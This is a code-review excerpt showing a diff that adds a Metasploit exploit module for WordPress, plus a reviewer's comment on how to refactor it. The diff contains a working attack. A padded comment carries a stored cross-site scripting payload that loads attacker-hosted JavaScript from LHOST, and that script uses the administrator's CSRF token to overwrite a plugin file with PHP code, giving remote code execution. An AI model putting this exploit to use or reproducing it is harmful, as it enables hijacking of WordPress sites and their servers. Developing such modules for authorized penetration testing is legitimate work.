modules/exploits/unix/webapp/wp_comment_overflow_exec.rb

```diff
@@ -0,0 +1,143 @@
+                OptString.new('URIPATH', [true, 'This is the URI path that will be created for the javascript hosted file','wp-met.js']),
+                OptString.new('SRVPORT', [true, 'This is the port for the javascript to connect back to','80']),
+            ], self.class)
+        end
+
+
+        def exploit
+
+            padding = "A"*66000
+
+            comment = "%3Ca+title%3D%27xxx+onmouseover%3Deval%28unescape%28%2Fvar%2520a%253Ddocument.createElement%2528%2527script%2527%2529%253Ba.setAttribute%2528%2527src%2527%252C%2527http%253A%252f%252f#{datastore['LHOST']}%253A#{datastore['SRVPORT']}%252f#{datastore['URIPATH']}%2527%2529%253Bdocument.head.appendChild%2528a%2529%2F.source%29%29+style%3Dposition%3Aabsolute%3Bleft%3A0%3Btop%3A0%3Bwidth%3A5000px%3Bheight%3A5000px++" + padding + "%27%3E%3C%2Fa%3E"
+
+            comment_post_ID = "#{datastore['COMMENTID']}"
+            cookie = "wp-settings-time-1=1431669695;"
+            post_data = "author=a&email=a%40a.com&url=http%3A%2F%2Fa&comment=" + comment + "&submit=Post+Comment&comment_post_ID=" + comment_post_ID + "&comment_parent=0"
+
+
+            resp = send_request_cgi({
+            'uri'     => "http://#{rhost}/wp-comments-post.php",
+            'version' => '1.1',
+            'method'  => 'POST',
+            'data'    => post_data,
+            'cookie'  => cookie
+          })
+
+
+
+          super
+
+          end
+
+          def on_request_uri(cli, request)
+
+                return if ((p = regenerate_payload(cli)) == nil)
+
+                rhost = datastore['RHOST']
+                plugin = datastore['PLUGIN']
+                page = "wp-comments-post-php"
+
+                p2 = payload.encoded
+                require 'cgi'
+                pc = CGI.escape(p2)
+
+                content = %Q|
+            var pcont = "#{pc}";
+            var head = "<?php ";
+            var tail = " ?> ";
+            var payload = head + pcont + tail;
+
+            function get(url)
+            {
+                var http = null;
+                http = new XMLHttpRequest();
+                http.open( "GET", url, false );
+                http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+                http.send( null );
+                return http.responseText;
+            }
+            function post(url, csrftoken)
+            {
+                var http = null;
+                http = new XMLHttpRequest();
+                http.open( "POST", url, false );
+                http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+                http.send("_wpnonce=" + csrftoken + "&_wp_http_referer=#{rhost}%2Fwp-admin%2Fplugin-editor.php%3Ffile%3D#{plugin}%26a%3Dte%26scrollto%3D605&newcontent=" + payload + "&action=update&file=#{plugin}&plugin=#{plugin}&scrollto=0&submit=Update+File");
+                return http.responseText;
+            }
```

Comment:
No need to create your own post method. Use send_request_cgi for post. To get the CSRF token, take a look at https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/phpmyadmin_config.rb for an example